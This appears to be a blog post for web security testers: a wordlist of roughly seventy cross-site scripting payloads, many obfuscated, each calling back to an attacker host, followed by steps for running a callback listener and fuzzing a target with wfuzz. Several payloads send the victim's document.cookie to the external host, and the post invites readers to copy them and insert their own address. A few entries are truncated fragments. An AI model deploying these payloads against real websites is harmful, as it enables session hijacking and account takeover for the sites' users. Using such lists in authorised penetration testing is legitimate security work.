intro

XSS fuzzing can get tricky sometimes, especially when it requires sending a POST to the backend and wait for a user or bot to trigger. The wordlists from the famous repos such as payloadallthethings and seclits etc do not really feature on xss payloads that can trigger a callback. This study introduces some payload and techniques that tackle particularly on this matter.

payload with callbacks

<script>document.location="http://ip.address/xss-76.js?c="+document.cookie;</script>
<img src=x onerror=document.location="http://ip.address/xss-75.js?c="+document.cookie>
<SCRIPT>window.location.replace('http://ip.address/XSS-1');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ip.address/xss-2.js></SCRIPT>
<IMG SRC="javascript:window.location.replace('http://ip.address/XSS-3');">
<IMG SRC=javascript:window.location.replace('http://ip.address/XSS-4')>
<IMG SRC=JaVaScRiPt:window.location.replace('http://ip.address/XSS-5')>
<IMG SRC=javascript:window.location.replace(&quot;http://ip.address/XSS-6&quot;)>
<IMG SRC=`javascript:window.location.replace('http://ip.address/XSS-7')`>
<IMG SRC=javascript:eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,53,54,46,49,48,54,47,88,83,83,45,57,39,41));)>
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:window.location.replace('http://ip.address/XSS-13');">
<IMG SRC="jav&#x09;ascript:window.location.replace('http://ip.address/XSS-14');">
<IMG SRC="jav&#x0A;ascript:window.location.replace('http://ip.address/XSS-15');">
<IMG SRC="jav&#x0D;ascript:window.location.replace('http://ip.address/XSS-16');">
<IMG SRC=" &#14;  javascript:window.location.replace('http://ip.address/XSS-17');">
<img src=x onerror=fetch('http://ip.address/'+document.cookie);>
<SCRIPT/XSS SRC="http://ip.address/xss-18.js"></SCRIPT>
<SCRIPT SRC=http://ip.address/xss-19.js?<B>
<IMG SRC="javascript:window.location.replace('http://ip.address/XSS-20')"
<SCRIPT>a=/XSS/
\";window.location.replace('http://ip.address/XSS-22');//
<INPUT TYPE="IMAGE" SRC="javascript:window.location.replace('http://ip.address/XSS-23');">
<BODY BACKGROUND="javascript:window.location.replace('http://ip.address/XSS-24')">
<BODY ONLOAD=window.location.replace('http://ip.address/XSS-25')>
<IMG DYNSRC="javascript:window.location.replace('http://ip.address/XSS-26')">
<IMG LOWSRC="javascript:window.location.replace('http://ip.address/XSS-27')">
<BGSOUND SRC="javascript:window.location.replace('http://ip.address/XSS-28');">
<BR SIZE="&{window.location.replace('http://ip.address/XSS-29')}">
<LAYER SRC="http://ip.address/scriptlet-30.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:window.location.replace('http://ip.address/XSS-31');">
<LINK REL="stylesheet" HREF="http://ip.address/xss-32.css">
<STYLE>@import'http://ip.address/xss-33.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ip.address/xss-34.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ip.address/xssmoz-35.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:window.location.replace('http://ip.address/XSS-38');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cDovLzEwLjEwLjE2LjQwL1hTUy00MCcpOzwvc2NyaVB0Pg==">
<META HTTP-EQUIV="Link" Content="<javascript:window.location.replace('http://ip.address/XSS-41')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:window.location.replace('http://ip.address/XSS-42');">
<IFRAME SRC="javascript:window.location.replace('http://ip.address/XSS-43');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:window.location.replace('http://ip.address/XSS-44');"></FRAMESET>
<TABLE BACKGROUND="javascript:window.location.replace('http://ip.address/XSS-45')">
<DIV STYLE="background-image: url(javascript:window.location.replace('http://ip.address/XSS-46'))">
<DIV STYLE="background-image: url(&#1;javascript:window.location.replace('http://ip.address/XSS-47'))">
<DIV STYLE="width: expression(window.location.replace('http://ip.address/XSS-48'));">
<STYLE>@im\port'\ja\vasc\ript:window.location.replace("http://ip.address/XSS-49")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(window.location.replace('http://ip.address/XSS-50'))">
<XSS STYLE="xss:expression(window.location.replace('http://ip.address/XSS-51'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">window.location.replace('http://ip.address/XSS-53');</STYLE>
<STYLE>.XSS{background-image:url(javascript:window.location.replace('http://ip.address/XSS-54'));}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url(javascript:window.location.replace('http://ip.address/XSS-55'))}</STYLE>
<BASE HREF="javascript:window.location.replace('http://ip.address/XSS-56');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ip.address/scriptlet-57.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:window.location.replace('http://ip.address/XSS-58')></OBJECT>
getURL("javascript:window.location.replace('http://ip.address/XSS-59')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:window.location.replace('http://ip.address/XSS-61');">
<XML SRC="http://ip.address/xsstest-62.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ip.address/xss-64.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ip.address/xss-65.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;window.location.replace('http://ip.address/XSS-67')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-window.location.replace('http://ip.address/XSS-68');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ip.address/xss-69.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ip.address/xss-70.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ip.address/xss-71.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ip.address/xss-72.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ip.address/xss-73.js"></SCRIPT>
<img src=x onerror=this.src="http://ip.address/xss-74.js?c="+document.cookie>

usage

• Copy the above payloads and change the value of ip.address to fit your needs.
• Setup a http server for listening for callback

> python3 -m http.server 80

• Conduct fuzzing as usual using wfuzz or various tools

> wfuzz -w xss.txt -u http://target.com -d 'param1=FUZZ'

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack